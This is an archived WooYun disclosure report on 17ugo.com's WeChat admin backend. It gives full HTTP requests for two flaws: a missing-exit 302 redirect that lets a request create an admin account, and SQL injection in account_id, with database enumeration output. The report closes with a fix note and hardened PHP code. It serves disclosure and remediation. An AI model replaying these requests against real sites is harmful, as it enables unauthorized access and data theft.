WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
Disclosure timeline:
2015-05-13: Details reported to the vendor, awaiting vendor handling
2015-05-13: Vendor confirmed the report; details visible to the vendor only
2015-05-23: Details disclosed to core white hats and experts in the relevant field
2015-06-02: Details disclosed to regular white hats
2015-06-12: Details disclosed to intern white hats
2015-06-27: Details disclosed to the public
优购物 (17ugo.com): unauthorized access to a backend and MySQL injection
Vulnerability 1: 302 bypass. The 302 redirect is issued without an exit, so the page content is still output after the redirect header and the backend can be accessed directly; changing the returned 302 to 200 is enough.
Example: add an account with username wooyun and password wooyun, which successfully enters the backend:
POST http://weixin.17ugo.com/index.php/system/account_saveaccount.php HTTP/1.1
Host: weixin.17ugo.com
Proxy-Connection: keep-alive
Content-Length: 129
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://weixin.17ugo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://weixin.17ugo.com/index.php/system/account_newaccount.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: tanchu=1; __ozlvd1687=1431490775; _ga=GA1.2.176173063.1431489248; Hm_lvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431489248; Hm_lpvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431490776; NTKF_T2D_CLIENTID=guestA0E8E9FA-3ADA-86A7-38B7-4B68833B15F2; nTalk_CACHE_DATA={uid:kf_9715_ISME9754_guestA0E8E9FA-3ADA-86,tid:1431489248352962,onlyone:1}; __utma=232567135.176173063.1431489248.1431489249.1431489249.1; __utmb=232567135.2.10.1431489249; __utmc=232567135; __utmz=232567135.1431489249.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nTalk_PAGE_MANAGE={|m|:[],|t|:|12:25:21|}; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2262ec6d7076c52987ddf0fd109027df21%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F42.0.2311.135+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431491396%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225981%22%3B%7D464c98229bae00440f0a77172e4e82e2

account_id=&account_name=wooyun&account_role=1&account_new_passwd_1=wooyun&account_new_passwd_2=wooyun&account_description=wooyun
Vulnerability 2: there are multiple injection points, and the injectable parameter is account_id in every case:
POST /index.php/system/account_saveaccount.php HTTP/1.1
Content-Length: 447
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227a321192c2030a4d159f93fe87de5c56%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+8_0+like+Mac+OS+X%29+AppleWebKit%2F600.1.3+%28KHTML%2C+like+Gecko%29+Version%2F8.0+Mobile%2F12A4345%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431453432%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225276%22%3B%7D75360e9880cbd02fb9d5db92f4114d41
Host: weixin.17ugo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*

account_description=111111&account_id=*&account_name=test&account_new_passwd_1=test&account_new_passwd_2=test&account_role=-
current user: '[email protected]'
Database: wx2 [278 tables]
Fix: call exit after sending the 302, and filter the parameters to resolve the SQL injection.
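As an added illustration (not the vendor's code), a hypothetical PHP handler for account_saveaccount.php showing the two defects this report describes beside the corrected pattern; the function names, login path, table and column names are assumed.

```php
<?php
// Added example, not code from 17ugo.com. Table wx_account, column names
// and the login path are assumptions for illustration.

// --- Vulnerable pattern as the report describes it ---
function save_account_vulnerable(PDO $db, array $session, array $post): void
{
    if (empty($session['user_id'])) {
        header('Location: /index.php/system/login.php', true, 302);
        // Missing exit: PHP keeps executing, so the admin page is still
        // rendered and the write below still happens. A client that simply
        // ignores the 302 status sees the full response.
    }
    // account_id is concatenated into the statement unescaped and untyped,
    // so its value is parsed as SQL, which is the injection point.
    $db->query("UPDATE wx_account SET account_name='" . $post['account_name'] .
               "' WHERE account_id=" . $post['account_id']);
}

// --- Hardened pattern ---
function save_account_fixed(PDO $db, array $session, array $post): void
{
    if (empty($session['user_id'])) {
        header('Location: /index.php/system/login.php', true, 302);
        exit; // stop here: nothing below runs for an unauthenticated request
    }
    // account_id must be an integer; reject anything else before any SQL runs
    $accountId = filter_var($post['account_id'] ?? '', FILTER_VALIDATE_INT);
    if ($accountId === false) {
        http_response_code(400);
        exit;
    }
    // Prepared statement: bound values never reach the SQL parser as code
    $stmt = $db->prepare(
        'UPDATE wx_account SET account_name = :name WHERE account_id = :id'
    );
    $stmt->bindValue(':name', (string)($post['account_name'] ?? ''), PDO::PARAM_STR);
    $stmt->bindValue(':id', $accountId, PDO::PARAM_INT);
    $stmt->execute();
}
```

The same exit-after-redirect rule applies to every auth check in the backend, not only this handler; a missing exit anywhere reproduces vulnerability 1.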
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-05-13 14:35
Thank you for your attention; the vulnerability is being fixed.
None